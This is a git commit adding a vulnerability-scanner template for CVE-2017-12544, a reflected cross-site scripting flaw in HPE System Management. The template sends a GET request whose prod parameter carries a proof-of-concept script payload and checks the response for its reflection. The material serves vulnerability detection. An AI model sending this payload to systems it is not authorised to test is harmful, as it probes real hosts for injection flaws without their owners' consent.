Add CVE-2017-12544.yaml

Template for HPE System Management XSS (CVE-2017-12544)
patch-1
Divya 2021-10-12 00:08:39 -04:00 committed by GitHub
parent 2452f36c48
commit 2a6acf66e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2017-12544
info:
name: HPE System Management - XSS
author: divya_mudgal
severity: medium
reference: https://seclists.org/fulldisclosure/2018/Mar/5
description: Reflected Cross-site scripting (XSS) on HPE System Management
tags: cve,cve2017,xss,hp,unauth
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-12544
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`1`;//"
matchers-condition: and
matchers:
- type: word
words:
- "'';prompt`1`;//';"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200